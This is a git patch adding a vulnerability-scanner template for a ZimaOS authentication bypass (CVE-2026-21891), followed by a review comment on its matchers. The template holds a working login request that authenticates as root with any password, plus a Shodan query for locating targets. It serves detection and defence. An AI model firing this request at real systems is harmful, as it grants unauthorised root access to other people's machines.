From 95377a901a76281f8ecaa3db3e3637061fd123ed Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 12 Feb 2026 14:09:05 +0530
Subject: [PATCH] Create CVE-2026-21891.yaml for ZimaOS auth bypass
---
http/cves/2026/CVE-2026-21891.yaml | 64 ++++++++++++++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 http/cves/2026/CVE-2026-21891.yaml
diff --git a/http/cves/2026/CVE-2026-21891.yaml b/http/cves/2026/CVE-2026-21891.yaml
new file mode 100644
index 000000000000..5dbe16cea213
--- /dev/null
+++ b/http/cves/2026/CVE-2026-21891.yaml
@@ -0,0 +1,64 @@
+id: CVE-2026-21891
+
+info:
+ name: ZimaOS - Authentication Bypass
+ author: DhiyaneshDk
+ severity: critical
+ description: |
+ ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.
+ impact: |
+ Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
+ remediation: |
+ Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
+ reference:
+ - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
+ - https://nvd.nist.gov/vuln/detail/CVE-2026-21891
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+ cvss-score: 9.4
+ cve-id: CVE-2026-21891
+ cwe-id: CWE-287
+ epss-score: 0.00059
+ epss-percentile: 0.18386
+ cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"ZimaOS"
+ product: zimaos
+ vendor: zimaspace
+ tags: cve,cve2026,zimaos,auth-bypass,broken-auth
+
+http:
+ - raw:
+ - |
+ POST /v1/users/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */*
+ Content-Type: application/json
+ Origin: {{RootURL}}
+ Referer: {{RootURL}}/
+
+ {
+ "username": "root",
+ "password": "anything"
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "success"
+ - "username"
+ - "created_at"
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200
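Review bot: The body matcher in the `matchers` block accepts any 200 JSON response containing the bare substrings `success`, `username` and `created_at`, so nothing ties a hit to the `root` account the request used or to ZimaOS itself. Word matching is substring-based, which means an unrelated API answering on `/v1/users/login` with a user-shaped object would also be reported as a critical finding. Consider matching the echoed account rather than loose words, for example a `type: regex` matcher on `part: body` with `'"username"\s*:\s*"root"'`; the response shape is not visible in this patch, so confirm it against a known-vulnerable instance first. A positive result presumably carries a live session for that account, so stored responses from this template should be handled as credentials.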